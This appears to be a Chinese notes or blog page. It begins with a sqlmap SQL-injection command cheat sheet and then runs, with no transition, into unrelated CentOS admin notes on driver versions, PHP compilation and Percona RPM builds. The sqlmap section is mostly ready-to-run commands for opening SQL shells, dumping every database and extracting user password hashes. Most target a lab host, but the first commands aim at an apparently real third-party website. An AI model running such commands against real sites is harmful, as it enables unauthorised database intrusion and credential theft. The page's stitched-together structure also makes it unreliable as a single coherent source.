夜行人

mickey整理
来源：影子

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

使用referer欺骗
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

使用基本认证
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

使用Digest认证
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

使用代理,配合TOR
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

使用多线程猜解
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux
* Windows

自定义payload
Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v

排除网站的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

多语句测试，php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

union注入测试
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

unionz注入配合orderby
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

fingerprint
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

列举数据库用户
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0

列举数据库用户密码
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

查看用户权限
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

列数据库
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

指定列的范围从2－4
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

导出所有数据库，所有表的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

只列出用户自己新建的数据库和表的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

sql query
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢复会话
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

保存选项到INC配置文件
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save

例如我们要查看博通网卡的驱动版本，如果该机器上刚好是博通的网卡，最简单的方法就是
ethtool -i eth0

但如果我们所查看的机器用的不是博通的网卡，则可以通过以下方法查看
我们知道博通网卡的驱动文件名叫bnx2.ko
我们查找下bnx2.ko的位置
updatedb
locate bnx2.ko
结果如下
/lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
查看驱动详细情况
modinfo /lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
以下信息中，version记录就是我们的网卡驱动版本，是2.0.8-j15

filename: /lib/modules/2.6.32-71.el6.x86_64/kernel/drivers/net/bnx2.ko
firmware: bnx2/bnx2-rv2p-09ax-5.0.0.j10.fw
firmware: bnx2/bnx2-rv2p-09-5.0.0.j10.fw
firmware: bnx2/bnx2-mips-09-5.0.0.j15.fw
firmware: bnx2/bnx2-rv2p-06-5.0.0.j3.fw
firmware: bnx2/bnx2-mips-06-5.0.0.j6.fw
version: 2.0.8-j15
license: GPL
description: Broadcom NetXtreme II BCM5706/5708/5709/5716 Driver
author: Michael Chan <mchan@broadcom.com>
srcversion: 8CDA41B3E0DF70A112FBA80
alias: pci:v000014E4d0000163Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Bsv*sd*bc*sc*i*
alias: pci:v000014E4d0000163Asv*sd*bc*sc*i*
alias: pci:v000014E4d00001639sv*sd*bc*sc*i*
alias: pci:v000014E4d000016ACsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv*sd*bc*sc*i*
alias: pci:v000014E4d000016AAsv0000103Csd00003102bc*sc*i*
alias: pci:v000014E4d0000164Csv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv*sd*bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003106bc*sc*i*
alias: pci:v000014E4d0000164Asv0000103Csd00003101bc*sc*i*
depends:
vermagic: 2.6.32-71.el6.x86_64 SMP mod_unload modversions
parm: disable_msi:Disable Message Signaled Interrupt (MSI) (int)

CentOS 6 64位版本,默认是不会安装32位软件的,这样就导致我们在安装PHP前安装的库,只会有64位版本

例如
yum -y install libjpeg libjpeg-devel libpng libpng-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel mhash freetype freetype-devel

这样安装,系统默认只会安装64位版本,假设我们用以下命令去安装PHP

CHOST="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe" CXXFLAGS="-march=nocona -O2 -pipe" \
./configure --prefix=/usr/local/php \
--with-config-file-path=/etc \
--with-mysql=/usr/loca/mysql --with-pdo-mysql=/usr/local/mysql/bin/mysql_config \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--with-iconv-dir=/usr/local \
--with-freetype-dir --with-jpeg-dir \
--with-png-dir --with-ttf \
--enable-zip --with-zlib \
--with-gd \
--disable-rpath --enable-discard-path \
--enable-safe-mode --enable-bcmath \
--enable-shmop --enable-sysvsem \
--with-curl --with-curlwrappers \
--enable-fastcgi --enable-force-cgi-redirect \
--enable-mbstring --with-mcrypt \
--disable-ipv6 \
--enable-static \
--enable-maintainer-zts \
--enable-zend-multibyte \
--enable-sockets \
--enable-soap \
--with-openssl \
--without-sqlite --without-pdo-sqlite

则会提示
configure: error: libjpeg.(a|so) not found.

通过rpm -qa |grep libjpeg是有安装的

解决办法是在configure里加入

--with-libdir=lib64

修改后是这样

CHOST="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe" CXXFLAGS="-march=nocona -O2 -pipe" \
./configure --prefix=/usr/local/php \
--with-libdir=lib64 \
--with-config-file-path=/etc \
--with-mysql=/usr/loca/mysql --with-pdo-mysql=/usr/local/mysql/bin/mysql_config \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--with-iconv-dir=/usr/local \
--with-freetype-dir --with-jpeg-dir \
--with-png-dir --with-ttf \
--enable-zip --with-zlib \
--with-gd \
--disable-rpath --enable-discard-path \
--enable-safe-mode --enable-bcmath \
--enable-shmop --enable-sysvsem \
--with-curl --with-curlwrappers \
--enable-fastcgi --enable-force-cgi-redirect \
--enable-mbstring --with-mcrypt \
--disable-ipv6 \
--enable-static \
--enable-maintainer-zts \
--enable-zend-multibyte \
--enable-sockets \
--enable-soap \
--with-openssl \
--without-sqlite --without-pdo-sqlite

不过,由于我们MySQL不是用rpm包装的,是自编译安装在/usr/local/mysql
如果使用以上configure参数,则会提示

configure: error: Cannot find libmysqlclient_r under /usr/local/mysql/.
Note that the MySQL client library is not bundled anymore!

此时做个修改

ln -s /usr/local/mysql/lib /usr/local/mysql/lib64

这样就可以configure通过了,然后就make && make install吧

题外话,如果要在CentOS6 64位上yum安装32位的软件
echo 'multilib_policy=all' >> /etc/yum.conf
就可以了

1、配置环境
yum -y install rpmbuild
2、下载源代码rpm包
mkdir /root/download
cd /root/download
wget http://www.percona.com/redir/downloads/Percona-Server-5.1/Percona-Server-5.1.58-12.9/source/Percona-Server-51-5.1.58-rel12.9.271.rhel6.src.rpm

3、安装打包MySQL时依赖的包

yum -y install perl readline-devel gcc-c++ ncurses-devel zlib-devel libtool automake autoconf time ccache bison

4、安装percona的源代码
rpm -ivh Percona-Server-51-5.1.58-rel12.9.271.rhel6.src.rpm

安装了2个文件，它们的位置是
/root/rpmbuild/SOURCES/Percona-Server-5.1.58.tar.gz
/root/rpmbuild/SPECS/percona-server.spec

5、修改percona-server.spec
加入我们自己的编译参数
vi percona-server.spec
将
# The --enable-assembler simply does nothing on systems that does not
# support assembler speedups.
和
%if %{YASSL_BUILD}
之间的一段修改成这样

# The --enable-assembler simply does nothing on systems that does not
# support assembler speedups.
sh -c  "CFLAGS=\"$CFLAGS\" \
        CXXFLAGS=\"$CXXFLAGS\" \
        AM_CPPFLAGS=\"$AM_CPPFLAGS\" \
        LDFLAGS=\"$LDFLAGS\" \
        ./configure \
            $* \
            --with-comment=MC-DB \
            --with-server-suffix=-MC-DB-Server \
            --with-charset=utf8 \
            --with-plugins=blackhole,csv,innodb_plugin \
            --enable-assembler \
            --enable-local-infile \
            --with-mysqld-user=%{mysqld_user} \
            --with-unix-socket-path=/tmp/mysql.sock \
            --with-pic \
            -prefix=/usr \
            --with-extra-charsets=gbk,gb2312,utf8 \
            --without-debug \
            --with-pthread \
            --enable-thread-safe-client \
            --with-client-ldflags=-all-static \
            --without-ndb-debug \
%if %{YASSL_BUILD}

保存退出

6、定义在打包过程中不进行测试
export MYSQL_RPMBUILD_TEST="no"

7、开始打包
cd /root/rpmbuild/SPECS/
rpmbuild -bb percona-server.spec
等待一段时间就可以看到编译好的软件包
/root/rpmbuild/RPMS/x86_64

Percona-Server-client-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-devel-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-server-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-shared-51-5.1.58-rel12.9.rhel6.x86_64.rpm
Percona-Server-test-51-5.1.58-rel12.9.rhel6.x86_64.rpm

7、安装顺序
先安装这个
Percona-Server-shared-51-5.1.58-rel12.9.rhel6.x86_64.rpm
再安装其他软件包
8、已知问题：
无法打包为一个包
无法将所有问题安装到一个目录，例如我们之前一直安装的目录/usr/local/mysql

9、题外话
一般MySQL源代码包都有包含打包所需要的spec文件，一般存放在support-files/下

64位CentOS 6 通过yum安装软件的时候，默认不会安装32位的软件，这样会导致某些软件无法安装成功，实际上yum仓库里是有32位软件的，只是它默认只安装64位软件，如果需要安装32位，有2个方法，
假设你要安装libjpeg的32位版本

方法1：
先查询
yum list |grep libjpeg
指定安装32位版
yum install libjpeg.i686

方法2：
这是一种一劳永逸的方法
echo 'multilib_policy=all' >> /etc/yum.conf
以下命令会同时安装32位和64位版
yum install libjpeg 

参考资料：http://grokbase.com/t/centos.org/centos/2011/07/centos-centos6-installing-32bit-and-64bit-rpms-via-the-installer/133tcfqf5pag5uldm62ygv34psia